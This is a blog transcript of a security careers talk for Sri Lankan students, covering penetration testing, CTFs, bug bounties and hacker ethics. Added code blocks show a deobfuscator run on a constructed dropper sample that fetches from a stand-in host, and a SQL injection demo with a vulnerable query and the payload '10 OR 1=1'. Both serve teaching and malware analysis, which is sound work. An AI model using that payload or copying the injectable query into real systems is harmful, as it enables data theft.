In June I had the wonderful privilege to speak with ex-LulzSec Jake Davis (https://twitter.com/DoubleJake) to some awesome students in Colombo, Sri Lanka. Hard to believe it was the nation's first ever Cyber Security conference for youth! The aim was both to raise awareness about Cyber Security and to reflect the different ways the students might understand it and merge into the industry. On top of the incredible hospitality (CICRA, Deakin), the food, culture, travel and especially the roasted cashews were all a pretty top experience. I'm only upset I couldn't stay longer, but it was the start of over 14 flights in under a month, so the schedule was tight.
BMICH - where the summit was held. I believe the president was talking literally in the other room from us, so security was super tight (military police had a good look at my RubberDucky + LANturtles o.O)
The summit was attended and shared by some exceptional people very well known in Sri Lanka - the Honourable Minister for Telecommunications Harin Fernando, the founder of the DailyFT, the CEO of CERT Sri Lanka Lal Dias, and the CEO of CICRA, now a great friend, Boshan Dayaratne. Beyond that, the most important attendance was that of the 500+ students, some of whom travelled almost 8 hours by bus overnight just to get there.
10/10 view to hack to, cosy and in the middle of Colombo. Also saw a tropical storm rip the roof off a building just below me, woo!
I'm very grateful to Deakin for providing the opportunity, even some years on from graduating. On behalf of Deakin, I spoke to the students about entry pathways into the world of InfoSec - namely penetration testing, and my experience based on work at BAE Systems & DroneSec. No amount of words can truly summarise the experience, but some of the images are listed here.
Right - on to the presentation; keep in mind it is angled towards a young audience, and a Sri Lankan one at that. I've transcribed it as best I can, so apologies if it's too long. The slides don't usually make much sense without the write-up, however. If you would prefer to see only the slides, you can at this link.
Journey to InfoSec - For Sri Lanka Youth
Ramble about the perception of hackers and the role they play in society.
Today I want to cover some of the basic elements to help you realise why there is a need for security – it’s a fine line between being able to do what you’re passionate about, and seeing why this is such an incredible field of opportunity that is only going to grow. I also want to touch on why people will pay you good money for it, so that you don’t need to follow the malicious path. Then, I’m going to give you some immediate actions you can take right now to set yourself up for a position in IT security – even earning money while you practise. We all know about the ‘shortage’ of IT security positions; hopefully this talk will give you an insight into what to do to close that gap for yourselves.
So what is security? Why does it affect our world and why are so many people, such as these organisers, intent on bringing you to learn about it? What do they have to gain? Let me tell you…A LOT.
In 1950s East Germany, the Stasi introduced a program to engineer a flaw, a deliberate issue, into every lock produced in the country, and created strict import guidelines to prevent any secure lock from entering the country. This meant the locks were deliberately vulnerable to their secret keys, or their method of opening them. This was the time when the Stasi, the secret police, had control over the people and often arrested or kidnapped those that didn’t agree with them. The flaw allowed them to quietly and quickly enter anyone's home at will. It completely subverted the private, personal space of everyone in the country. Oftentimes, people wouldn’t even know they’d been compromised or had people in their house!
That is to say, if you don't understand the technology that keeps you safe, you can't trust that you are actually secure.
So how do you understand the technology? You break it! You make it, pull it apart and practice with it, manipulate it and see how it works. If only they had some lockpickers back in the day, they may well have found the flaw.
How do you understand technology? Practice! --> Ways to practice
• Understand how something’s built (build something)
• Understand how something works, how to manipulate it
So now we know what we have to do – to assess the security of something, we need to be able to understand it.
The need for security is ingrained in every technology, every platform – everything these days surrounds it. Information Security is never complete, but a constant vehicle of research, fixing, recommending and sharing related information to better past and future products. By sharing information, fewer people get affected, which is better for business and saves time, all while people fulfil their passion of breaking and securing things!
So these people are creating products, but to make good products, it takes many people, and different people use different technologies (e.g. coding).
The products hold information valuable to hackers, however, so hackers look for issues that can be part of one technology, or a combination of many, and find vulnerabilities that can be exploited to get access to that information.
So in terms of what I do, as a penetration tester – I step into the shoes of these hackers and also go after that valuable information, finding similar bugs and vulnerabilities – but this time, warning the client about them instead of stealing the information.
If by chance I don’t manage to find it, or they haven’t had a penetration test, incident responders will arrive at a scene after malware or hackers, to quickly analyse it and stop the problem. They are very important as they tell the client, and the client’s friends what not to do next time.
Back in the Dark Ages, it was so easy to say you’d grow up to be a blacksmith, a baker, a butcher. That’s because you could see their work and you used their services. These days the digital age has put a barrier between you and seeing my/our work - in fact, I’ve probably done penetration testing on your bank, your mobile phone apps and plan, the websites you use. The moment you take a peek at exactly what they do, your passion becomes more real.
InfoSec covers a huge range of items, and even within penetration testing there is a huge number of sub-categories. Just like how cricket has specific positions, batter, bowler, midfielder, as does security – this filters out a lot of talent and leaves you to become a well-paid expert in that area very quickly! I promise you if you were to simply focus on mobile & IoT testing, you’d have work for the next few decades and be handsomely paid for it. With so much diversity there is room for anyone to become an expert.
When I first walked into BAE Systems, the first thing I noticed was that people were introduced as ‘this is x, SCADA tester’, ‘malware reverse engineer’, ‘social engineer/lockpicker’, ‘mobile & wireless security’ – they work so well in a team because they specialise. You’ll want to find your specialisation too, but make sure it’s an area of interest. We will cover that further on.
Okay, so let’s dive down into a penetration test – this is the most common scenario I do; hacking at its purest (bread and butter so always billable ;)). Everything is from the perspective of a black hat, so you have to hunt information that might be crucial to them, and you don’t have to follow any kind of pattern or direct path.
The easiest way to achieve access (e.g. brute-forcing) is still very relevant where it is possible. The main result is showing how to fix those issues, both now and in the future – this allows the client to protect their customers.
A defined scope might also be useful for bank applications where they have many testers hitting one form or search bar. Usually, however, hackers will look for the lowest-hanging fruit to go after, so scoping should never be too particular.
So how would you assess, say, a WordPress website?
When we look at a website, we often just see the front end. In reality, going back to our suggestion of many people working on something with lots of different technologies, a website is a combination of items. For example, there are the different layers here.
There are many other layers, from the machine it’s running on, to the web addresses and passwords used, and even plugins or third-party scripts. All these layers have their own set of code and issues. Versions are important, because each new version patches or fixes issues seen in the previous release – found by hackers or developers. Older versions often contain vulnerabilities that are made public and can be exploited – hence why it’s so crucial to update!
So each one of these components has its own set of vulnerabilities and attack vectors. Hence why in a penetration test, there may be multiple ways to compromise the application. Having more people going over these different components, such as bug bounty hunters, can also dramatically improve your security, as each one has been looked at.
So to dramatically widen your idea of security, all these layers and components are within many different types of technology! It moves so fast that there are always going to be people needed for security. Any of you here watch Twitch? It’s recent! Drones were only a figment of imagination, and Uber uses technology in a way no one else used to think about! With these new technologies, many of you know about things myself and other experts don’t even know about. Your role in this new technology will be paramount.
I often find adults/experts misunderstand the knowledge and skills of young people. They attribute APTs to nation states when it’s most likely a young kid with a tool. It makes me sad because of the young Sri Lankan student caught for defacing the president’s website to ask for an extension on exams. A bright young kid who, under the age of 18-21, got caught following his passion because he lacked the guidance or knowledge to do it ethically while getting paid for it.
Most of the InfoSec community used to work in other sectors, such as computer science, web development, and networking, and moved horizontally into IT Security as it came about. You have the opportunity to start fresh in InfoSec – learning from the ground up, dedicating all your years to becoming an expert. This means you’ll be helping businesses with issues, solving problems and getting paid at a younger age than most.
I’ve got a cool story about change actually – how many of you know about Bitcoin? Long story short it is a digital currency, invented sometime in 2009 by a completely unknown person. It’s completely virtual, and can be gained by mining or trading items. In about 2011-2012, I was a heavy user of bitcoin, buying eBooks and tools online for 30, 40, sometimes 100 bitcoin.
When bitcoin hit $30 each in around 2013, I mentioned it to a very high profile visiting Wall Street guru from the US at an economics lecture. He said there was no place for decentralized currencies in the world, and that it would be quickly shut down by the banks. About 6 months later the currency was worth over $1000 USD each – making anyone who had BTC a small fortune. This slide was from a talk I gave about 8 months ago to some students when the price was around 91,000Rs.
This month, one BTC is worth 374,000Rs! Who knows, this could go up again shortly – the main point is, you most likely know something about technology that many others don’t; don’t feel like it will take years to learn, you could latch onto something brand new and become an expert from there!
In North America, during the time when Native American tribes ruled the land, there was an Apache tribe that lived between some very tall mountains. The tribe was a warrior tribe, and loved to fight. In order for traders to come to the village, however, they had to travel through a dark and narrow canyon.
The tribe depended on the trade to flourish; however, both they and the traders knew it was a dangerous valley. Many of the tribespeople were selfish, and when a trader came through, ambushed him to take all of the goods. This could make them temporarily rich, but then the other traders heard about the danger and stayed away – this meant their bounties were few and far between (for them and for the rest of the tribe).
The chieftain came up with an idea – why not have each person spend some time protecting the valley, allowing more traders to come in? As they did, each person would earn a small daily percentage from the traders passing through to the village. On top of that, they’d get to practise their fighting spirit by fighting off bandits; they could legally fight, earn a wage, and talk about it in public! They were regarded as heroes!
Those who chose to be selfish and not help the whole town continued to steal. It got harder as the guards earned more and more trade came in. Often, the bandits would be sent to jail, losing everything they had. The villagers could even send and receive things with the traders without worry of it being stolen or destroyed – just like you and I.
We’re still in the wild west today – we have the same scenario, and you have the ability to join the good side. You have a passion for hacking, and you get to use it! You can speak about your skills and experiences, and it’s legal! You get paid to do it, and make friends in the community.
It’s hard to translate a business making money from your work in a pre-work context. Using myself as an example, this is what my company requests me to do, that makes everyone happy.
That’s how you get paid to hack. Not only do you get paid, but you’ve helped secure technology for people like yourself and your friends, and contributed to others by sharing information about the issue – so hopefully it doesn’t come up next time!
So we know what we’re trying to provide, we know what employers expect of us – but getting that position in the first place is the tough one! Who’s seen crazy job requirements like this before? Who thinks they could do all those skills? A common factor on job applications is ‘Problem Solving.’ I’m going to show you an example of this when I had no idea what kind of skill to apply in this situation.
A client reported that they had received this email, with an invoice attached – anti-virus didn’t pick up the malware, but they got ransomware on their computer. I came in to look and found a suspicious email, which someone had opened. It looked like pretty complex code, but somehow it made enough sense to deliver malware to their machine! I quickly realised this code wasn’t really code at all, but the malware authors' way of hiding the real intent of what it does.
Quite quickly, I started to notice things like ‘HTTP’ and “://my”, which looked like URLs! I also saw bits of words which weren’t quite clear…in this case, it looked like the code had been muddled up and the words substituted.
I have a short video of decoding the script – taking whatever each variable ‘equals’ and substituting its value back in wherever it is used. This is a common obfuscation technique, but it requires some analysis in order to identify it.
I was able to put together the entire script…using nothing but Notepad! I found it visited a URL, downloaded a payload and then executed it on the system. This bypassed antivirus for two reasons: 1. obfuscation of the code, and 2. because it was only a dropper! It didn’t do anything malicious itself, yet it was able to download a file into the network.
I submitted it to a variety of threat intelligence sites, one low-level example being VirusTotal. On the day, not a single engine detected it as being malicious! However, once we had submitted it as malware, the next day almost 14 anti-virus engines were detecting it – stopping it from hitting other customers. A couple of months later, only thirty vendors saw it as malware – so obviously it did a decent job of hiding itself.
In the end, we were able to give the client and the community something: actionable advice. Because we found the IP address of the malware, we were able to block it and share it with the world. Hundreds of other companies then added it to their blocklists, meaning it couldn’t affect many others. This was rewarding, as you see your work helping others, and it involves real critical thinking skills to analyse malware.
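The substitution shown in the video can be mechanised. What follows is an added Python example, not the author's Notepad method and not the real attachment: it folds a constructed, VBScript-style sample (the variable names, the `.example` host and the function names are all mine) back into the strings the script actually used, so the URL can be pulled out for blocking and sharing.

```python
import re

# Constructed sample in a VBScript-like style; it is NOT the real attachment.
# Every word the analyst cares about is split across variables and glued back
# together with '&', so a plain-text search for "http" finds nothing.
SAMPLE = '''
qx = "HTT"
mm = "P://my"
wk = "-invoice-portal"
zz = qx & mm & wk & ".example"
pth = "/in" & "v" & "oice"
ext = ".bin"
target = zz & pth & ext
act = "Dow" & "nload"
Run act, target
'''

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
LITERAL = re.compile(r'"([^"]*)"')
URL = re.compile(r'https?://[\w.\-/]+', re.IGNORECASE)


def parse_assignments(script):
    """Collect every `name = expr` line; expr is a '&'-joined mix of literals and names.
    (Assumes the quoted literals themselves contain no '&'.)"""
    env = {}
    for line in script.splitlines():
        m = ASSIGN.match(line)
        if m:
            env[m.group(1)] = [tok.strip() for tok in m.group(2).split('&')]
    return env


def resolve(name, env, seen=()):
    """Fold one variable to its concrete string, following references recursively."""
    if name in seen:
        raise ValueError(f"cyclic reference through {name}")
    parts = []
    for tok in env[name]:
        lit = LITERAL.fullmatch(tok)
        if lit:
            parts.append(lit.group(1))                        # quoted fragment
        elif tok in env:
            parts.append(resolve(tok, env, seen + (name,)))   # another variable
        else:
            parts.append(tok)                                 # unknown name: keep visible
    return ''.join(parts)


def deobfuscate(script):
    """Return (variable -> folded value, non-assignment statements with values inlined)."""
    env = parse_assignments(script)
    values = {name: resolve(name, env) for name in env}

    def inline(match):
        word = match.group()
        return f'"{values[word]}"' if word in values else word

    # Single pass per line, so a substituted value is never re-substituted.
    statements = [re.sub(r'\b\w+\b', inline, line).strip()
                  for line in script.splitlines()
                  if line.strip() and not ASSIGN.match(line)]
    return values, statements


def extract_urls(statements):
    """Pull the URLs out of the rewritten statements: the indicators to block and share."""
    return sorted({u for s in statements for u in URL.findall(s)})


if __name__ == "__main__":
    values, statements = deobfuscate(SAMPLE)
    for s in statements:
        print(s)   # Run "Download", "HTTP://my-invoice-portal.example/invoice.bin"
    print(extract_urls(statements))
```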
So you know what security is, you know how it applies to technology, and that you’ll get paid well for doing it. Thinking back to those job requirements…how do you prepare for them now?
There are many ways, but one of the most common ways of getting good at something is doing it repeatedly – and how do you do it repeatedly, legally, before starting in the industry? Exposure! You can expose yourself to the world of security far before you enter the workplace.
When I first started university, I was PUMPED to go in and just hack stuff – but I knew nothing about the other parts of security, or why it mattered to others at all (like I’ve just told you). I realised very quickly that university provides an amazing platform for you to be open-ended in your learning – that is, it provides you a platform, structure and community, and you fill in the rest. You can fill in the rest with ANYTHING you like.
The concept of gamification is a competition or platform containing deliberately vulnerable systems or networks. This means it challenges you to do very similar work to what you’d be undertaking within a real role in Cyber Security. For many, it allows them to hack ethically and legally without the need to practise on equipment belonging to others. I loved the concept so much, and was so motivated by it, that I decided to get three of my good friends together and practise it. That three soon became thirty, and so on!
The best form of gamification in my mind is ‘Capture-The-Flag’, which pits you against other students, or people across the world, in a challenge to get the most points. One of the best things about CTFs is that some of the most professional and best hackers in the world are competing, and join in collaborative chats – meaning you can see how they work, chat to them and learn from them.
There are a range of challenges, from web, infrastructure, crypto and network, and much of the learning comes after the event, reading others’ write-ups.
Similar to gaming, you get a very relevant feeling of rush, feedback, and see yourself improving over time.
Bug Bounties are an excellent way to gain hands-on experience, and sometimes can be better than CTFs as they utilise real-world production systems. The concept is simple – you look for a bug on places like Facebook, Microsoft, Uber, report issues and get paid individually for each issue. You are legally allowed to test their websites, and scope/reports are excellent training for real-life!
Bug Bounties can be done at any stage, without any experience, requirements or certifications, so they are a great way to earn good money in US dollars. Similarly, if you get good enough, you can enter private programs, where they source only the best bounty hunters to participate in closed programs that are often unavailable to the public – this is where the big money is at. Keep in mind, Mark Litchfield is an edge case, but a great one at that.
Hands up if you’ve ever seen one of the most famous cricketers play in a test match by himself. What about a race car driver winning the grand prix without racing against anyone else? Skilled people are often, though not always, surrounded by their peers. Motivated, challenged; they hear about events and opportunities because they’re connected to their ‘tribe.’ It’s the same for infosec. You may have a lone hacker who’s good at some things – but sometimes you need multiple people to assess a product or company with multiple layers, requiring many different technologies, mindsets and skillsets.
Once you have a tribe, you can start to mirror the working environment that you’ll be going into, like a machine. When I founded the DISC club, it was because I wanted people to help motivate ME to learn; I would never have found that group of people if it weren’t for Deakin. I wouldn’t have been here if it weren’t for Deakin – universities connect you, they bring people with connections and opportunities. By supplementing your degree with skills, you become a very relevant and useful business case to your employers.
So you might now be thinking – I can practise everything I need pre-work, I know what to work on, and I can even test without any requirements and earn money! I’m ready for the workforce! However, if I were to board the plane at Melbourne airport and say to the pilots “hey guys look, I’ve done all the simulators, don’t worry I can fly” – or walked into a hospital and said “I’ve practised! I can operate on this sick man” – do you think I would get very far?
The first thing is that IT Security deals with people’s lives as much as pilots or doctors do. We secure critical infrastructure, we prevent hackers from turning off a hospital network, disrupting aircraft systems, and hacking into vehicles. Just like a medical degree or a pilot’s licence, it can be useful to get certified to show employers you’ve worked hard for x amount of years on this – you’re serious, and you’re willing to listen to people with a lot of knowledge and background in the area. It's certainly not always the case, and plenty of great hackers don't have degrees - however in the world of business, it can be super helpful to get your foot in the door.
Now that you’ve exposed yourself to different technologies, examples of a day in the life of a pentester, and have some examples behind you, how can you prove this to an employer? Can they see the hacks you’ve done?
YES. What does a web developer do when they go for a job? They bring a portfolio of their work, examples of sites. What can a penetration tester do? We can also bring a portfolio.
Take the CTF competitions you’ve participated in and the challenges you tackled, and format them like this:
Issue: SQL injection
Description: Due to improper sanitisation – found at test.com/hello.php?id=10
Business Case: Could access the client database and customer payment details
Recommendation: Use prepared statements
That is: what the issue was, why it was important, how it could have been exploited and how you could fix it. You can also include any online challenges you’ve done, tools you’ve made on GitHub, or bug bounties.
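A runnable version of that portfolio entry, added here as an example rather than taken from the talk: the lookup behind a `hello.php?id=10` style parameter, written first the way the ‘improper sanitisation’ finding describes it and then with the recommended prepared statement. It uses Python’s sqlite3 with a small constructed customer table standing in for the client database; the function names are mine.

```python
import sqlite3

# Constructed stand-in for the client database in the portfolio entry.
CUSTOMERS = [(10, "Amali", "4242"), (11, "Ruwan", "1881"), (12, "Nadia", "0005")]


def make_db():
    """In-memory database holding the kind of payment details the finding puts at risk."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, card_last4 TEXT)")
    con.executemany("INSERT INTO customers VALUES (?, ?, ?)", CUSTOMERS)
    return con


def lookup_vulnerable(con, raw_id):
    """The finding: the ?id= value is pasted straight into the SQL text, so whatever
    the user typed becomes part of the query the database runs."""
    query = f"SELECT name, card_last4 FROM customers WHERE id = {raw_id}"
    return con.execute(query).fetchall()


def lookup_prepared(con, raw_id):
    """The recommendation: a prepared statement. The SQL is fixed, the value travels
    separately as a bound parameter, and because the page's id is numeric anything
    that is not an integer is rejected before it reaches the database."""
    try:
        customer_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    return con.execute(
        "SELECT name, card_last4 FROM customers WHERE id = ?", (customer_id,)
    ).fetchall()


if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, "10"))         # [('Amali', '4242')]
    print(lookup_vulnerable(con, "10 OR 1=1"))  # every row: the whole customer table leaks
    print(lookup_prepared(con, "10 OR 1=1"))    # []
    print(lookup_prepared(con, "10"))           # [('Amali', '4242')]
```

The second call is the ‘Business Case’ line of the write-up made concrete: one tampered parameter returns every customer’s payment detail, while the prepared statement returns only the row the id names or nothing at all.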
This way, you know what you’re talking about (because you’ve practised), you know where you’re going (specialisation), and you know how to contribute to a business – this will set you apart from those who just have the skills, or certifications!
Now, as many of you know, I flew in from Melbourne to Singapore and then to Sri Lanka. On the journey over there was a fair amount of turbulence and I couldn’t sleep, so I started chatting to a lady named Tashy – we chatted for a bit and I explained I was coming over to a group of very talented people, in the hope of giving them a bit of information I wish I’d had before finishing school. When she found out it was about ethical hacking, her immediate reaction was “Oh…I’m so sorry to tell you this, but most will use it for bad uses.”
And you know what, I don’t blame her for thinking that! It’s so easy to realise you harness a certain amount of power once you have the skills – however, I told her I’d been in a very similar position, and only when guided by mentors (many at Deakin, such as Lei Pan) did the right path become a lot clearer. You can’t blame people; the whole internet points towards being bad instead of showing the good side. In chatting to her, I promised I’d tell you a story about someone in the hacker community from around the same time as DoubleJake and I.
Back in high school, I used to chat to a lot of the hackers in different groups – it was how I learned at that point, as I was too young for university and too bored at a school that wasn’t teaching me what I wanted.
Most people knew a couple of fellows from a hacking group called ‘TeamPois0n’, including a guy known as ‘TricK.’ The group was a blackhat group, similar to LulzSec, and eventually had some of its members arrested for hacking into the MI5 (British SS) phone lines. Most of the community back then would chat to these guys, and knew them fairly well on forums, chats etc.
Just before the end of high school, I took another path and had no contact with any of the old groups. I focused on CTFs, and on learning with peers at uni rather than online. A few years passed and I had worked at a number of places, eventually for BAE Systems. One day I was riding the tram from work when a news article popped up at me…
“TeamPoison member killed by US drone strike”
Hacking or ‘hacktivism’ took him too far, and although this is an extreme edge case, he ended up fighting for ISIS as their ‘cyber caliphate.’ While this is a rare exception, I know there are many young Australians today with no real compass as to where they want to go in Cyber Security - they love hacking, but fail to channel it into something legal, of worth, protecting Australian companies and making real money from it.
Through the Deakin Information Security Club and SecTalks, my aim is to always let you guys know (both in and new to the industry) there is a world of businesses out there just waiting to pay you for hacking - legally, safely, and without ending up with jail time.
If you’re feeling the pressure of school, know what you want to do – and want to fast-track yourself to working in an industry you love, that will make you proud and help secure your country, you can follow similar steps to these.
Keep in mind this is oriented towards the Sri Lankan Community. For an Australian-centric version, something similar to below: